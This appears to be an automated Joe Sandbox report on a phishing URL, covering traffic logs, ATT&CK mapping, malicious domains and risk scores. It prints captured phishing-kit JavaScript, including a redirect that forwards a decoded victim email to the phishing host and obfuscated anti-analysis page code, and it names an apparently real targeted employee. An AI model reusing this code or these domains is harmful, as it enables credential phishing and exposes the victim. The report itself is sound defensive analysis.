Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: classification engine

Classification label: mal80.phis.win@17/33@13/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1740 --field-trial-handle=2024,i,7034162612721822103,13615644138870281852,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1740 --field-trial-handle=2024,i,7034162612721822103,13615644138870281852,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://yta1lbtzic.ludomessie.shop/?email=	0%	Avira URL Cloud	safe
http://abdullaksa.com/fetching//index.xslt	0%	Avira URL Cloud	safe
http://abdullaksa.com/fetching//index.xml	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/ic/1A9TC07ARGDSH4FIUU63X4WA8	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/aty/XSQZV8DIZUPYQ33UUIAS6TR2C	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/bxg/ZQFETUCJ4MFF4FUB31FABJSBQ	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/ecpt/8M1Q7M3MYL7GVKY6S0FI3RTYX	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/mxl/sig_op.svg	0%	Avira URL Cloud	safe
http://abdullaksa.com/favicon.ico	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/cxx/IX9HZ4SHDYP35GCKXCU0FK5LD	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/jx/I1DG3RMJL00LK2CD7OY4FD1R6	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/mxl/mlg.svg?96T28VKXHF81R7WIH0I9JK813	0%	Avira URL Cloud	safe
https://yta1lbtzic.ludomessie.shop/m/sm/YEGUW1WZ86VSGF4U8HGDSSDYB	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
abdullaksa.com	192.185.118.129	true	true	unknown
www.google.com	142.250.186.100	true	false	high
yta1lbtzic.ludomessie.shop	203.161.57.139	true	true	unknown
cdn.jsdelivr.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://abdullaksa.com/fetching//index.xslt	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/ecpt/8M1Q7M3MYL7GVKY6S0FI3RTYX	false	Avira URL Cloud: safe	unknown
http://abdullaksa.com/fetching//index.xml	true	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/aty/XSQZV8DIZUPYQ33UUIAS6TR2C	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/ic/1A9TC07ARGDSH4FIUU63X4WA8	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/bxg/ZQFETUCJ4MFF4FUB31FABJSBQ	false	Avira URL Cloud: safe	unknown
http://abdullaksa.com/favicon.ico	false	Avira URL Cloud: safe	unknown
http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t	false		unknown
https://yta1lbtzic.ludomessie.shop/m/mxl/sig_op.svg	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/cxx/IX9HZ4SHDYP35GCKXCU0FK5LD	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/jx/I1DG3RMJL00LK2CD7OY4FD1R6	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/?email=glalicker@hilcorp.com	true		unknown
https://yta1lbtzic.ludomessie.shop/m/mxl/mlg.svg?96T28VKXHF81R7WIH0I9JK813	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/sm/YEGUW1WZ86VSGF4U8HGDSSDYB	false	Avira URL Cloud: safe	unknown
https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372d088fc5eba68266f598.htm	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/graphs/contributors)	chromecache_59.1.dr, chromecache_64.1.dr	false		high
https://yta1lbtzic.ludomessie.shop/?email=	chromecache_69.1.dr	true	Avira URL Cloud: safe	unknown
https://github.com/twbs/bootstrap/blob/main/LICENSE)	chromecache_62.1.dr, chromecache_59.1.dr, chromecache_64.1.dr	false		high
https://getbootstrap.com/)	chromecache_62.1.dr, chromecache_59.1.dr, chromecache_64.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
203.161.57.139	yta1lbtzic.ludomessie.shop	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
192.185.118.129	abdullaksa.com	United States	46606	UNIFIEDLAYER-AS-1US	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587098
Start date and time:	2025-01-09 23:29:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.phis.win@17/33@13/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.186.110, 74.125.133.84, 104.18.187.31, 104.18.186.31, 199.232.210.172, 192.229.221.95, 142.250.184.195, 216.58.206.35, 216.58.206.67, 23.56.254.164, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://abdullaksa.com/fetching//index.xml#?email=Z2xhbGlja2VyQGhpbGNvcnAuY29t

Input	Output
URL: http://abdullaksa.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: http://abdullaksa.com
URL: https://yta1lbtzic.ludomessie.shop/m/jx/I1DG3RMJL0... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any obfuscation or aggressive DOM manipulation. Overall, this script is likely benign and used for legitimate web development purposes." }
/! jQuery v3.7.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n\|\|C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?n[i.call(e)]\|\|"object":typeof e}var t="3.7.0",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]\|\|{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]\|\|{},s++),"object"==typeof a\|\|v(a)\|\|(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)\|\|(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i\|\|ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e\|\|"[object Object]"!==i.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i\|\|9===i\|\|11===i)return e.textContent;if(3===i\|\|4===i)return e.nodeValue}else while(t=e[r++])n+=ce.text(t);return n},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument\|\|e).documentElement;return!l.test(t\|\|n&&n.nodeName\|\|"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,
URL: http://abdullaksa.com/fetching//index.xml#?email=Z... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution (via `atob` function), data exfiltration (sending user email to an external domain), and redirects to a suspicious domain. The use of a base64-encoded email parameter and the redirection after a short delay further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat." }
// Function to get the value of a parameter from the URL function getParameterByName(name, url) { if (!url) url = window.location.href; name = name.replace(/[\[\]]/g, "\\$&"); var regex = new RegExp("[?&]" + name + "(=([^&#]*)\|&\|#\|$)"), results = regex.exec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(/\+/g, " ")); } var base64EmailParam = getParameterByName('email'); function decodeEmail(base64Email) { return atob(base64Email); } if (base64EmailParam) { var email = decodeEmail(base64EmailParam); setTimeout(function () { window.location.href = 'https://yta1lbtzic.ludomessie.shop/?email=' + email; }, 1000); }
URL: https://yta1lbtzic.ludomessie.shop/?email=glalicke... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. The use of `eval`, `Function` constructor, and aggressive DOM manipulation indicate potential malicious intent. Additionally, the script sets a cookie and redirects the user to an unknown location, which raises further concerns. While some contextual factors, such as the use of a modal dialog, may suggest legitimate functionality, the overall behavior of this script is highly suspicious and poses a significant security risk." }
var _0x17d0bb=_0x4400;function _0x4400(_0x33d568,_0x56aee1){var _0x28f930=_0x1e42();return _0x4400=function(_0x8e9da3,_0x495ac1){_0x8e9da3=_0x8e9da3-0x15f;var _0x508969=_0x28f930[_0x8e9da3];return _0x508969;},_0x4400(_0x33d568,_0x56aee1);}(function(_0x529f02,_0x96881a){var _0x3b7dec=_0x4400,_0x3d5e2d=_0x529f02();while(!![]){try{var _0x2b8190=parseInt(_0x3b7dec(0x182))/0x1+parseInt(_0x3b7dec(0x187))/0x2(-parseInt(_0x3b7dec(0x169))/0x3)+-parseInt(_0x3b7dec(0x186))/0x4(-parseInt(_0x3b7dec(0x16f))/0x5)+-parseInt(_0x3b7dec(0x17d))/0x6(parseInt(_0x3b7dec(0x163))/0x7)+parseInt(_0x3b7dec(0x175))/0x8(parseInt(_0x3b7dec(0x162))/0x9)+-parseInt(_0x3b7dec(0x168))/0xa+parseInt(_0x3b7dec(0x161))/0xb;if(_0x2b8190===_0x96881a)break;else _0x3d5e2d['push'](_0x3d5e2d['shift']());}catch(_0x349cea){_0x3d5e2d['push'](_0x3d5e2d['shift']());}}}(_0x1e42,0x64e65));var _0x2e501e=(function(){var _0x8820cc=!![];return function(_0xb3cf9,_0x1e6654){var _0x1e2615=_0x8820cc?function(){var _0x190170=_0x4400;if(_0x1e6654){var _0x5e0c82=_0x1e6654[_0x190170(0x160)](_0xb3cf9,arguments);return _0x1e6654=null,_0x5e0c82;}}:function(){};return _0x8820cc=![],_0x1e2615;};}()),_0x28447d=_0x2e501e(this,function(){var _0x99db18=_0x4400;return _0x28447d['toString']()[_0x99db18(0x176)]('(((.+)+)+)+$')[_0x99db18(0x17a)]()['constructor'](_0x28447d)[_0x99db18(0x176)](_0x99db18(0x174));});_0x28447d();var _0x495ac1=(function(){var _0x21fbbf=!![];return function(_0x5aa19e,_0x369fc8){var _0x2e71b3=_0x21fbbf?function(){var _0xd20347=_0x4400;if(_0x369fc8){var _0x1306f7=_0x369fc8[_0xd20347(0x160)](_0x5aa19e,arguments);return _0x369fc8=null,_0x1306f7;}}:function(){};return _0x21fbbf=![],_0x2e71b3;};}()),_0x8e9da3=_0x495ac1(this,function(){var _0x4415df=_0x4400,_0x40686b=function(){var _0xeae0b9=_0x4400,_0x59d91f;try{_0x59d91f=Function('return\x20(function()\x20'+_0xeae0b9(0x166)+');')();}catch(_0x321a5b){_0x59d91f=window;}return _0x59d91f;},_0x4ff17d=_0x40686b(),_0x1c3a3c=_0x4ff17d[_0x4415df(0x16c)]=_0x4ff17d[_0x4415df(0x16c)]\|\|{},_0x7f23a4=[_0x4415df(0x172),'warn',_0x4415df(0x185),_0x4415df(0x17e),'exception','table',_0x4415df(0x17b)];for(var _0x5756f7=0x0;_0x5756f7<_0x7f23a4[_0x4415df(0x178)];_0x5756f7++){var _0x4130fa=_0x495ac1[_0x4415df(0x16a)][_0x4415df(0x181)][_0x4415df(0x15f)](_0x495ac1),_0x21d745=_0x7f23a4[_0x5756f7],_0x56e97e=_0x1c3a3c[_0x21d745]\|\|_0x4130fa;_0x4130fa['__proto__']=_0x495ac1['bind'](_0x495ac1),_0x4130fa[_0x4415df(0x17a)]=_0x56e97e[_0x4415df(0x17a)]['bind'](_0x56e97e),_0x1c3a3c[_0x21d745]=_0x4130fa;}});_0x8e9da3(),document['getElementById']('body')[_0x17d0bb(0x17c)](_0x17d0bb(0x184),myFunction);var Timeout;function myFunction(){var _0x5dbb15=_0x17d0bb;document[_0x5dbb15(0x179)]('body')[_0x5dbb15(0x173)](_0x5dbb15(0x184),myFunction),clearTimeout(Timeout),goto();}function _0x1e42(){var _0x56b20e=['918046okSKCZ','path=/;\x20Secure;\x20SameSite=None','bind','apply','4567585dtSWBo','677601nWeNYG','283437KBCuSQ','preload','body','{}.constructor(\x22return\x20this\x22)(\x20)','document','8175060DvsEbk','3TzGAja','constructor','Modal','console','reload','location','1015IkfbIS','setTime',';domain=','log','removeEventListener','(((.+)+)+)+$','8mXRIOQ','search','show','length','getElementById','toString','trace','addEventListener','30LzWLhb','error','getTime','wnotice','prototype','766558VKTqQh','expires=','mouseover','info','12516MkXyGH'];_0x1e42=function(){return _0x56b20e;};return _0x1e42();}Timeout=setTimeout(function(){var _0x10d6bc=_0x17d0bb,_0x29a7a7=new bootstrap[(_0x10d6bc(0x16b))](document[_0x10d6bc(0x179)](_0x10d6bc(0x180)),{'keyboard':![]});_0x29a7a7[_0x10d6bc(0x177)](),document['getElementById'](_0x10d6bc(0x165))[_0x10d6bc(0x173)](_0x10d6bc(0x184),myFunction);},0x1388);function goto(){var _0xe0de0=_0x17d0bb;setCookie(_0xe0de0(0x164),'1',window[_0xe0de0(0x16e)]['host']),setTimeout(()=>{var _0x5cf114=_0xe0de0;location[_0x5cf114(0x16d)]();},0xbb8);}function setCookie(_0x3e4a3d,_0x16f1bb,_0x29ee96){var _0x2d5ce7=_0x17d0bb;let _0x3d551d=new Date();_0x3d551d[_0x2
URL: https://yta1lbtzic.ludomessie.shop/m/dce3ee7580372... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote or dynamic code, which poses a significant security risk. It also sends sensitive data, such as user information and session identifiers, to external servers, which could lead to data breaches. Additionally, the script uses heavily obfuscated code and URLs, making it difficult to analyze and understand its true purpose. These factors, combined with the suspicious nature of the script's behavior, indicate a high risk of malicious intent." }
function _0x496c(){var _0x1d3579=['296ZIxXNs','log','prototype','1420lrozaH','toString','trace','917462xaJkqA','error','634536LSpEol','7883352TpabIk','table','exception','317961rFIbHQ','178967eYZNyA','8NwClPj','onkeydown','console','bind','search','(((.+)+)+)+$','419652WBikVP','apply','return\x20(function()\x20','keyCode','contextmenu'];_0x496c=function(){return _0x1d3579;};return _0x496c();}var _0x3f0783=_0x5740;(function(_0x1e6505,_0x96876c){var _0x2cbc3a=_0x5740,_0x1d4735=_0x1e6505();while(!![]){try{var _0x11f3c6=-parseInt(_0x2cbc3a(0x163))/0x1+-parseInt(_0x2cbc3a(0x15e))/0x2+-parseInt(_0x2cbc3a(0x162))/0x3+parseInt(_0x2cbc3a(0x156))/0x4(-parseInt(_0x2cbc3a(0x159))/0x5)+parseInt(_0x2cbc3a(0x151))/0x6+-parseInt(_0x2cbc3a(0x15c))/0x7(parseInt(_0x2cbc3a(0x164))/0x8)+parseInt(_0x2cbc3a(0x15f))/0x9;if(_0x11f3c6===_0x96876c)break;else _0x1d4735['push'](_0x1d4735['shift']());}catch(_0x16b797){_0x1d4735['push'](_0x1d4735['shift']());}}}(_0x496c,0x2ec4e));var _0x3085a7=(function(){var _0xf352e4=!![];return function(_0x11b422,_0xff323b){var _0x27e3fd=_0xf352e4?function(){if(_0xff323b){var _0x535ea9=_0xff323b['apply'](_0x11b422,arguments);return _0xff323b=null,_0x535ea9;}}:function(){};return _0xf352e4=![],_0x27e3fd;};}()),_0x41a8ad=_0x3085a7(this,function(){var _0x25e311=_0x5740;return _0x41a8ad[_0x25e311(0x15a)]()[_0x25e311(0x14f)](_0x25e311(0x150))[_0x25e311(0x15a)]()['constructor'](_0x41a8ad)[_0x25e311(0x14f)]('(((.+)+)+)+$');});_0x41a8ad();var _0x2d8d99=(function(){var _0x16cc4a=!![];return function(_0x3d69c3,_0x1c44c5){var _0x3af659=_0x16cc4a?function(){var _0x507834=_0x5740;if(_0x1c44c5){var _0x2b2d9f=_0x1c44c5[_0x507834(0x152)](_0x3d69c3,arguments);return _0x1c44c5=null,_0x2b2d9f;}}:function(){};return _0x16cc4a=![],_0x3af659;};}()),_0x3f164b=_0x2d8d99(this,function(){var _0x401c9e=_0x5740,_0x238212=function(){var _0x4b7226=_0x5740,_0x417967;try{_0x417967=Function(_0x4b7226(0x153)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x5da31b){_0x417967=window;}return _0x417967;},_0x366315=_0x238212(),_0x4b49ae=_0x366315['console']=_0x366315[_0x401c9e(0x14d)]\|\|{},_0x177120=[_0x401c9e(0x157),'warn','info',_0x401c9e(0x15d),_0x401c9e(0x161),_0x401c9e(0x160),_0x401c9e(0x15b)];for(var _0xfaf8b7=0x0;_0xfaf8b7<_0x177120['length'];_0xfaf8b7++){var _0x8fd877=_0x2d8d99['constructor'][_0x401c9e(0x158)][_0x401c9e(0x14e)](_0x2d8d99),_0x2f2eb3=_0x177120[_0xfaf8b7],_0x54b937=_0x4b49ae[_0x2f2eb3]\|\|_0x8fd877;_0x8fd877['__proto__']=_0x2d8d99[_0x401c9e(0x14e)](_0x2d8d99),_0x8fd877[_0x401c9e(0x15a)]=_0x54b937[_0x401c9e(0x15a)][_0x401c9e(0x14e)](_0x54b937),_0x4b49ae[_0x2f2eb3]=_0x8fd877;}});function _0x5740(_0x174e82,_0x57db5b){var _0x51943f=_0x496c();return _0x5740=function(_0x3f164b,_0x2d8d99){_0x3f164b=_0x3f164b-0x14c;var _0x5c4daa=_0x51943f[_0x3f164b];return _0x5c4daa;},_0x5740(_0x174e82,_0x57db5b);}_0x3f164b(),$(document)['bind'](_0x3f0783(0x155),function(_0x31051a){return![];}),document[_0x3f0783(0x14c)]=function(_0x2b584b){var _0x116636=_0x3f0783;return _0x2b584b['ctrlKey']&&(_0x2b584b[_0x116636(0x154)]===0x49\|\|_0x2b584b['keyCode']===0x69\|\|_0x2b584b[_0x116636(0x154)]===0x4a\|\|_0x2b584b[_0x116636(0x154)]===0x6a\|\|_0x2b584b[_0x116636(0x154)]===0x55\|\|_0x2b584b[_0x116636(0x154)]===0x75)?![]:!![];}; var pagemsg="{\"LoginPage\":{\"text\":null,\"color\":\"black\"},\"PassPage\":{\"text\":null,\"color\":\"black\"}}"; var semail = "glalicker@hilcorp.com"; var urlx,purlx,lmode; urlx = atob("c2NyaXB0LnBocA=="); lmode="b"; purlx=urlx;
